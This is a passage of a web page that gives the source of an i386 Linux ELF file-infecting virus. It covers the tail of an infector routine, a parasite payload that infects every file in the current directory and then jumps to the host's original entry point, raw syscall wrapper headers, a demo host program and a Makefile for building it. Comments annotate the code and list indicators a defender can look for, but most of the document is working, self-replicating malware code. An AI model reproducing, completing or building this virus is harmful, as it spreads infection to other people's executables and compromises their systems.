&gt; phdr[txt_index+1].p_vaddr) { <br />
V_DEBUG_WRITE(1, &amp;luck, sizeof(luck)); <br />
goto err; <br />
} <br />
<br />
break; <br />
} <br />
txt_index++; <br />
} <br />
<br />
/* Modify the entry point of the ELF */ <br />
org_entry = ehdr-&gt;e_entry; <br />
ehdr-&gt;e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz; <br />
<br />
new_code_pos = <br />
(void *) ehdr + phdr[txt_index].p_offset + phdr[txt_index].p_filesz; <br />
<br />
/* Increase the p_filesz and p_memsz of text segment <br />
* for new code */ <br />
phdr[txt_index].p_filesz += align_code_size; <br />
phdr[txt_index].p_memsz += align_code_size; <br />
<br />
for (i = 0; i &lt; ehdr-&gt;e_phnum; i++) <br />
if (phdr[i].p_offset &gt;= (unsigned long) new_code_pos - (unsigned long) ehdr) <br />
phdr[i].p_offset += align_code_size; <br />
<br />
tmp_flag = 0; <br />
for (i = 0; i &lt; ehdr-&gt;e_shnum; i++) { <br />
if (shdr[i].sh_offset &gt;= (unsigned long) new_code_pos - (unsigned long) ehdr) { <br />
shdr[i].sh_offset += align_code_size; <br />
if (!tmp_flag &amp;&amp; i) { /* associating the new_code to the last <br />
* section in the text segment */ <br />
shdr[i-1].sh_size += align_code_size; <br />
tmp_flag = 1; <br />
} <br />
} <br />
} <br />
<br />
/* Increase p_shoff in the ELF header */ <br />
ehdr-&gt;e_shoff += align_code_size; <br />
<br />
/* Make a new file */ <br />
tmp_fd = g_open(tmpfile, O_WRONLY|O_CREAT|O_TRUNC, stat.st_mode); <br />
if (tmp_fd == -1) { <br />
goto err; <br />
} <br />
<br />
size = new_code_pos - (void *) ehdr; <br />
if (g_write(tmp_fd, ehdr, size) != size) <br />
goto err; <br />
<br />
__memcpy(tmp_v_code, v_code, v_code_size); <br />
__memcpy(tmp_v_code + v_retaddr_addr_offset, &amp;org_entry, sizeof(org_entry)); <br />
if (g_write(tmp_fd, tmp_v_code, align_code_size) != align_code_size) { <br />
goto err; <br />
} <br />
<br />
if (g_write(tmp_fd, (void *) ehdr + size, stat.st_size - size) <br />
!= stat.st_size - size) { <br />
goto err; <br />
} <br />
<br />
g_close(tmp_fd); <br />
g_munmap(ehdr, stat.st_size); <br />
g_close(fd); <br />
<br />
if (g_rename(tmpfile, file) == -1) { <br />
goto err; <br />
} <br />
<br />
return 0; <br />
err: <br />
if (tmp_fd != -1) <br />
g_close(tmp_fd); <br />
if (ehdr) <br />
g_munmap(ehdr, stat.st_size); <br />
if (fd != -1) <br />
g_close(fd); <br />
return -1; <br />
} <br />
<br />
/*
 * Payload body. The bytes of this (inlined) routine are what the infector
 * copies into a host binary, so everything it needs has to be reachable from
 * the code itself: no libc, no .rodata, no relocations -- only the raw
 * int $0x80 wrappers from gsyscall.h. i386 only.
 *
 * Control flow, as far as the visible code shows:
 *   1. save eax/ecx/edx by hand (restored at `out:`);
 *   2. open "." and iterate it with the raw getdents syscall, handing every
 *      entry name -- unfiltered, "." and ".." included -- to infect_virus();
 *   3. find its own address with a jmp/call/pop pair so the copied code works
 *      at whatever address the host maps it;
 *   4. undo the compiler's stack frame by hand and "return" to a placeholder
 *      address (0xAABBCCDD); the infector presumably patches that immediate
 *      with the host's original e_entry (the org_entry copy at
 *      v_retaddr_addr_offset in infect_virus) -- confirm against the build.
 *
 * Reviewer notes:
 *   - The exit sequence hard-codes the frame layout GCC produced for this
 *     exact build (Makefile: -O2 -fomit-frame-pointer): 0x102c bytes of
 *     stack plus the four callee-saved registers it pops. Any change to the
 *     locals, the compiler or its flags silently breaks it.
 *   - None of the asm statements declares clobbers, so the compiler is not
 *     told that eax/ecx/edx are pushed or that the stack pointer moves.
 *   - Indicators a defender can look for in a host, from the infector code
 *     above: e_entry moved to the end of the text segment, text
 *     p_filesz/p_memsz grown by the payload size, a temp file renamed over
 *     the original, and a `push imm32; ret` tail at the new entry.
 */
static inline void virus_code(void)
{
	char dirdata[4096];		/* raw getdents buffer */
	struct dirent *dirp;
	int curfd;
	int nbyte, c;
	unsigned long para_code_start_addr;

	/* Save the caller-clobbered registers by hand; the compiler is not told
	 * about these pushes (no clobber list). They are popped at out:. */
	__asm__ volatile (
		"push %%eax\n\t"
		"push %%ecx\n\t"
		"push %%edx\n\t"
		::);

	char curdir[2] = {'.', 0};
	char newline = '\n';

	/* Stored a second time on purpose: presumably so GCC builds the bytes
	 * on the stack instead of referencing .rodata, which the copied payload
	 * could not reach -- confirm against the generated code. */
	curdir[0] = '.';
	curdir[1] = 0;
	newline = '\n';

	if ((curfd = g_open(curdir, O_RDONLY, 0)) < 0)
		goto out;

	/* Get start address of virus code: jump forward to get_start_addr
	 * (in the exit asm below), which calls back to infect_start; the popl
	 * then reads the address of the instruction after that call. */
	__asm__ volatile (
		"jmp get_start_addr\n"
		"infect_start:\n\t"
		"popl %0\n\t"
		:"=m" (para_code_start_addr)
		:);
	/* Rebase to the beginning of the payload. PARACODE_RETADDR_ADDR_OFFSET
	 * is defined elsewhere and must match the layout the infector assumes. */
	para_code_start_addr -= PARACODE_RETADDR_ADDR_OFFSET - 1;

	/* Infecting: every name returned by getdents is handed to infect_virus,
	 * which has to do its own filtering (non-ELF, ".", ".."). */
	while ((nbyte = g_getdents(curfd, (struct dirent *)
				   &dirdata, sizeof(dirdata))) > 0) {
		c = 0;
		dirp = (struct dirent *) &dirdata;
		do {
			/* Debug trace of the entry name; the length expression is a
			 * hand-rolled offsetof(struct dirent, d_name). V_DEBUG_WRITE is
			 * defined elsewhere (the Makefile builds with -DNDEBUG, which
			 * presumably compiles it out). */
			V_DEBUG_WRITE(1, dirp->d_name, dirp->d_reclen - (unsigned long)
				      &(((struct dirent *) 0)->d_name));
			V_DEBUG_WRITE(1, &newline, sizeof(newline));

			infect_virus(dirp->d_name,
				     (void *) para_code_start_addr,
				     PARACODE_LENGTH,
				     PARACODE_RETADDR_ADDR_OFFSET);

			/* Records are variable length: advance by d_reclen until the
			 * bytes returned by this getdents call are consumed. */
			c += dirp->d_reclen;
			if (c >= nbyte)
				break;
			dirp = (struct dirent *)((char *)dirp + dirp->d_reclen);
		} while (1);
	}
	g_close(curfd);
out:
	/* Hand-unwind: restore eax/ecx/edx, discard the 0x102c bytes of stack
	 * the asm assumes the compiler allocated for the locals, restore the
	 * callee-saved registers, then push the placeholder 0xAABBCCDD and
	 * `ret` to it. get_start_addr/infect_start implement the address trick
	 * used above; control only falls through them once, via the jmp. */
	__asm__ volatile (
		"popl %%edx\n\t"
		"popl %%ecx\n\t"
		"popl %%eax\n\t"
		"addl $0x102c, %%esp\n\t"
		"popl %%ebx\n\t"
		"popl %%esi\n\t"
		"popl %%edi\n\t"
		"popl %%ebp\n\t"
		"jmp return\n"
		"get_start_addr:\n\t"
		"call infect_start\n"
		"return:\n\t"
		"push $0xAABBCCDD\n\t" /* push ret_addr */
		"ret\n"
		::);
}
<br />
/*
 * Exported entry of the payload. Because virus_code() is static inline, its
 * body is emitted here; the infector (g-elf-infector.c, not on this page)
 * presumably uses the addresses of parasite_code and parasite_code_end to
 * delimit the bytes it copies, so PARACODE_LENGTH and
 * PARACODE_RETADDR_ADDR_OFFSET (defined elsewhere) must agree with the code
 * the compiler emits for this function -- confirm.
 */
void parasite_code(void)
{
	virus_code();
}
/* End marker following parasite_code in the text section; the self-call
 * presumably only keeps the function from being dropped and is never meant
 * to run. Relies on the compiler laying the two functions out in order. */
void parasite_code_end(void) {parasite_code();}
------------------------------ gvirus.c ------------------------------ <br />
<br />
------------------------------ gunistd.h ------------------------------ <br />
#ifndef _G2_UNISTD_
#define _G2_UNISTD_

/*
 * Minimal i386 Linux system-call wrappers (int $0x80) in the style of the
 * old <asm/unistd.h> _syscallN macros, so the payload can make syscalls
 * without libc. g_syscallN(type, name, ...) expands to a complete function
 * definition named g_<name>; the caller supplies the storage class
 * (gsyscall.h prefixes them with `static inline`). __NR_<name> must already
 * be visible where the macro is used.
 *
 * Register convention as encoded in the constraints: eax carries the
 * syscall number in and the result out; arguments 1..6 go in ebx, ecx, edx,
 * esi, edi, ebp.
 *
 * Reviewer notes:
 *  - none of the asm statements declares a "memory" clobber, so the compiler
 *    is free to move loads/stores of the buffers a syscall reads or fills
 *    (stat, dirent, write data) across the trap; the callers on this page
 *    are small enough that this happens to work;
 *  - `__res`, `g__syscall_return` and `_G2_UNISTD_` are reserved
 *    identifiers (double underscore / underscore + capital);
 *  - i386 only; not valid for native 64-bit code.
 */

/*
 * The kernel returns a negative errno in eax. Anything in [-125, -1] is
 * collapsed to -1 and the errno value is discarded (there is no errno
 * here). 125 is the cut-off of the old i386 kernel header; current kernels
 * may return errno values up to 4095, which this test would pass through as
 * a large positive "success".
 */
#define g__syscall_return(type, res) \
do { \
	if ((unsigned long)(res) >= (unsigned long)(-125)) { \
		res = -1; \
	} \
	return (type) (res); \
} while (0)

/* Zero arguments: "0" ties the number to operand 0 (eax), result in eax. */
#define g_syscall0(type,name) \
type g_##name(void) \
{ \
	long __res; \
	__asm__ volatile ("int $0x80" \
		: "=a" (__res) \
		: "0" (__NR_##name)); \
	g__syscall_return(type,__res); \
}

/* One argument in ebx. */
#define g_syscall1(type,name,type1,arg1) \
type g_##name(type1 arg1) \
{ \
	long __res; \
	__asm__ volatile ("int $0x80" \
		: "=a" (__res) \
		: "0" (__NR_##name),"b" ((long)(arg1))); \
	g__syscall_return(type,__res); \
}

/* Two arguments: ebx, ecx. */
#define g_syscall2(type,name,type1,arg1,type2,arg2) \
type g_##name(type1 arg1,type2 arg2) \
{ \
	long __res; \
	__asm__ volatile ("int $0x80" \
		: "=a" (__res) \
		: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2))); \
	g__syscall_return(type,__res); \
}

/* Three arguments: ebx, ecx, edx. */
#define g_syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \
type g_##name(type1 arg1,type2 arg2,type3 arg3) \
{ \
	long __res; \
	__asm__ volatile ("int $0x80" \
		: "=a" (__res) \
		: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
		  "d" ((long)(arg3))); \
	g__syscall_return(type,__res); \
}

/* Four arguments: ebx, ecx, edx, esi. */
#define g_syscall4(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4) \
type g_##name (type1 arg1, type2 arg2, type3 arg3, type4 arg4) \
{ \
	long __res; \
	__asm__ volatile ("int $0x80" \
		: "=a" (__res) \
		: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
		  "d" ((long)(arg3)),"S" ((long)(arg4))); \
	g__syscall_return(type,__res); \
}

/* Five arguments: ebx, ecx, edx, esi, edi. */
#define g_syscall5(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \
		   type5,arg5) \
type g_##name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5) \
{ \
	long __res; \
	__asm__ volatile ("int $0x80" \
		: "=a" (__res) \
		: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
		  "d" ((long)(arg3)),"S" ((long)(arg4)),"D" ((long)(arg5))); \
	g__syscall_return(type,__res); \
}

/* Six arguments: ebp cannot be named in a constraint, so arg6 arrives in
 * eax ("0"), is moved to ebp around the trap, and the syscall number is an
 * immediate ("i", so __NR_name must be a compile-time constant). */
#define g_syscall6(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \
		   type5,arg5,type6,arg6) \
type g_##name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5,type6 arg6) \
{ \
	long __res; \
	__asm__ volatile ("push %%ebp ; movl %%eax,%%ebp ; movl %1,%%eax ; int $0x80 ; pop %%ebp" \
		: "=a" (__res) \
		: "i" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
		  "d" ((long)(arg3)),"S" ((long)(arg4)),"D" ((long)(arg5)), \
		  "0" ((long)(arg6))); \
	g__syscall_return(type,__res); \
}

#endif /* _G2_UNISTD_ */
------------------------------ gunistd.h ------------------------------ <br />
<br />
------------------------------ gsyscall.h ------------------------------ <br />
<br />
#ifndef _G2_SYSCALL_ <br />
#define _G2_SYSCALL_ <br />
<br />
#include &lt;sys/types.h&gt; <br />
#include &lt;sys/mman.h&gt; <br />
<br />
#include &lt;linux/unistd.h&gt; <br />
#include &lt;linux/fcntl.h&gt; <br />
<br />
#include &quot;gunistd.h&quot; <br />
<br />
/* Hand-defined because <stddef.h> is avoided. If the toolchain's
 * <sys/types.h> already defines NULL (usually as ((void *)0)) this is a
 * redefinition and at least a warning -- confirm with the target libc. */
#define NULL 0
<br />
/*
 * Record layout matching the legacy 32-bit getdents(2) syscall, written out
 * by hand so <dirent.h>/<limits.h> are not needed. Records are variable
 * length: d_reclen is the size of the whole record and d_name is
 * NUL-terminated; 256 is only an upper bound. Consumers must step by
 * d_reclen, never by sizeof(struct dirent) -- see virus_code().
 */
struct dirent {
	long d_ino;
	unsigned long d_off;
	unsigned short d_reclen;
	char d_name[256]; /* We must not include limits.h! */
};
<br />
/*
 * Hand-copied i386 kernel `struct stat`: the layout the raw 32-bit fstat
 * syscall below fills, not libc's and not the stat64 one. Field order and
 * widths must match the kernel ABI exactly. st_size is 32-bit, so sizes of
 * 4 GiB and above are misreported. Not portable to other architectures.
 */
struct stat {
	unsigned long st_dev;
	unsigned long st_ino;
	unsigned short st_mode;
	unsigned short st_nlink;
	unsigned short st_uid;
	unsigned short st_gid;
	unsigned long st_rdev;
	unsigned long st_size;
	unsigned long st_blksize;
	unsigned long st_blocks;
	unsigned long st_atime;
	unsigned long st_atime_nsec;
	unsigned long st_mtime;
	unsigned long st_mtime_nsec;
	unsigned long st_ctime;
	unsigned long st_ctime_nsec;
	unsigned long __unused4;
	unsigned long __unused5;
};
<br />
/*
 * Instantiate the raw wrappers the payload needs (each line expands to a
 * function definition, see gunistd.h; the trailing `;` is a stray
 * file-scope semicolon GCC tolerates). Raw syscall semantics apply:
 *  - g_write's count is typed off_t rather than size_t (same width on i386);
 *  - g_getdents is the legacy getdents and fills the `struct dirent` above;
 *  - g_mmap2 is the i386 mmap2 syscall, whose offset is in pages, not bytes;
 *  - g_fstat fills the kernel-layout `struct stat` above.
 * All return -1 on any failure and lose the errno (see g__syscall_return).
 * `uint` relies on <sys/types.h> providing it.
 */
static inline g_syscall3(int, write, int, fd, const void *, buf, off_t, count);
static inline g_syscall3(int, getdents, uint, fd, struct dirent *, dirp, uint, count);
static inline g_syscall3(int, open, const char *, file, int, flag, int, mode);
static inline g_syscall1(int, close, int, fd);
static inline g_syscall6(void *, mmap2, void *, addr, size_t, len, int, prot,
			 int, flags, int, fd, off_t, offset);
static inline g_syscall2(int, munmap, void *, addr, size_t, len);
static inline g_syscall2(int, rename, const char *, oldpath, const char *, newpath);
static inline g_syscall2(int, fstat, int, filedes, struct stat *, buf);
<br />
/*
 * Self-contained memcpy, essentially the i386 kernel string.h version, so
 * the payload never references libc's memcpy. Copies n bytes from `from` to
 * `to` and returns `to`; the regions must not overlap and the direction flag
 * is assumed clear.
 *
 * Operand map: %0 ecx = n/4 (dword count for rep movsl), %1 edi = to,
 * %2 esi = from, %3 = n/4, %4 = n. The "q" constraint on n keeps it in a
 * byte-addressable register so %b4 can test bits 1 and 0 for the movsw /
 * movsb tail. Unlike the syscall wrappers this one does declare "memory".
 * Reserved identifier (double underscore); i386 only.
 */
static inline void * __memcpy(void * to, const void * from, size_t n)
{
	int d0, d1, d2;
	__asm__ __volatile__(
		"rep ; movsl\n\t"
		"testb $2,%b4\n\t"
		"je 1f\n\t"
		"movsw\n"
		"1:\ttestb $1,%b4\n\t"
		"je 2f\n\t"
		"movsb\n"
		"2:"
		: "=&c" (d0), "=&D" (d1), "=&S" (d2)
		:"0" (n/4), "q" (n),"1" ((long) to),"2" ((long) from)
		: "memory");
	return (to);
}
<br />
#endif /* _G2_SYSCALL_ */ <br />
------------------------------ gsyscall.h ------------------------------ <br />
<br />
------------------------------ foo.c ------------------------------ <br />
#include &lt;stdio.h&gt; <br />
<br />
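/*
 * Minimal host program; the Makefile builds it as `foo`, presumably the
 * binary the infector is exercised against. It prints a marker so one can
 * see whether control still reaches the original entry point afterwards.
 * Uses the C11 prototype form `main(void)` instead of the obsolescent
 * empty-parentheses declaration.
 */
int main(void)
{
	puts("real elf point");
	return 0;
}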
------------------------------ foo.c ------------------------------ <br />
<br />
------------------------------ Makefile ------------------------------ <br />
# Demo build: `foo` is the host binary, `gei` the infector linked with the
# compiled payload object. Recipe lines must begin with a TAB; the HTML
# rendering of this page drops that indentation.
all: foo gei

# g-elf-infector.c is not shown on this page.
gei: g-elf-infector.c gvirus.o
	gcc -O2 $< gvirus.o -o gei -Wall -DNDEBUG

foo: foo.c
	gcc $< -o foo

# -O2 and -fomit-frame-pointer determine the stack frame that virus_code's
# hand-written exit asm assumes; building gvirus.c any other way breaks it.
# -DNDEBUG presumably compiles out the V_DEBUG_WRITE traces.
gvirus.o: gvirus.c
	gcc $< -O2 -c -o gvirus.o -fomit-frame-pointer -Wall -DNDEBUG

clean:
	rm *.o -rf
	rm foo -rf
	rm gei -rf
------------------------------ Makefile ------------------------------
